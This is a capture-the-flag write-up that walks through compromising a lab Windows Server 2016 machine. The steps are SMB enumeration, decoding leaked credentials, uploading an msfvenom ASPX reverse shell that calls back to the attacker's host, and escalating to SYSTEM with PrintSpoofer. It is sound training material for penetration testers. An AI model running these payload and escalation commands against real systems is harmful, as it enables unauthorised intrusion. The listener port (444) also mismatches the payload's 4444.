Let’s start with a full port scan with Nmap:
This is why it is good to start off with a full port scan as there are a number of ports that are outside the top 10,000. I will now run a service scan on these ports for further enumeration and also use common scripts.
Check smb shares:
Make a directory on attack machine /mnt/share and mount the share:
On attack machine navigate to /mnt/share
Looks to be base64 encoded as we have the == on the end. Let’s decode:
OK so we have a user bob and password !P@$$W0rD!12
Decoding the next string we have:
User Bill Password Juw4nnaM4n420696969!$$$
Cannot go any further with the enumeration, these credentials just do not work with the smb.
IIS Web Servers:
From the Nmap scan we can see two IIS web servers, one on port 80 and the other on port 49663.
IIS Web Server Port 80:
Here we have the standard landing page, let’s enumerate for hidden directories using Gobuster. After running Gobuster for several minutes no directories are showing, let’s move to port 49663:
Interestingly the directory found on the smb server also maps to the website:
10.10.216.112:49663/nt4wrksv
If we navigate to this page and add the password.txt to the url we see the following:
back to smb and we can try to upload a shell and navigate through the website to execute the reverse shell.
To create the shell we will use msfvenom, we can easily construct this using the Venom Builder from the following website:
https://pentest.ws/tools/venom-builder
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.6.68 LPORT=4444 — platform windows -a x64 -f aspx -o shell.aspx
Once created we can upload the shell.aspx to the webserver using smb put command.
Let’s setup a Netcat listener on port 444 and try to capture our reverse shell.
We are currently user iis apppool\defaultapppool
We can navigate to c:\Users\Bob\Desktop and grab the user.txt file:
Looking at the systeminfo:
We can see that we are running MS Windows Server 2016, so it is unlikely that a Rotten Potato exploit would work; however, there is a newer exploit that is known to exploit later Windows 10 and Windows Server 2016/2019.
https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
This exploit tool is called PrintSpoofer and can be found at the site below:
If we have SeImersonatePrivilege or SeAssignPrimaryTokenPrivilege, we should be able to exploit the machine and get NT AUTHORITY\SYSTEM.
To do this we need to upload the exploit the PrintSpoofer.exe exploit to the /nt4wrksv directory. We can upload the file using the smb connection we established earlier using smbclient.
Navigating to the c:\inetpub\wwwroot\nt4wrksv directory we can see the file we saw in the smb share:
We can now run the exploit using the following command:
PrintSpoofer.exe -i -c cmd.exe
We are now nt authority\system and we can navigate to the Administrator directory and grab the root.txt flag:
I enjoyed this box as I was not aware of the PrintSpoofer exploit, which is certainly useful for more modern versions of MS Windows where either SeImersonatePrivilege or SeAssignPrimaryTokenPrivilege are enabled.
Thank you to TheMayor for developing this box.
